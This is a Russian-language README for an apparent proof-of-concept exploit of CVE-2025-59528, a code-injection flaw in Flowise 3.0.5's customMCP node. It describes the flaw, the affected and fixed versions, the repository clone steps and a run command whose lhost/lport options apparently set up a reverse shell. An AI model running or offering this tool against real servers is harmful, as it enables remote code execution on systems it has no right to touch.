
CVE-2025-59528: доказательство концепции
Этот репозиторий содержит proof of concept, демонстрирующий CVE-2025-59528 в Flowise v3.0.5.
Уязвимость существует в узле customMCP, где вводимые пользователем данные mcpServerConfig обрабатываются таким образом, что приводит к выполнению JavaScript-кода через небезопасное вычисление с использованием конструктора Function.
| Затронутые | Исправленные |
|---|---|
| 3.0.5 | 3.0.6 |
Аутентифицированный пользователь может выполнить произвольный JavaScript на сервере, что потенциально может привести к удалённому выполнению кода.
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

Этот инструмент предоставляется исключительно в образовательных и исследовательских целях. Создатель не несёт ответственности за любое неправомерное использование или ущерб, причинённый с помощью данного инструмента.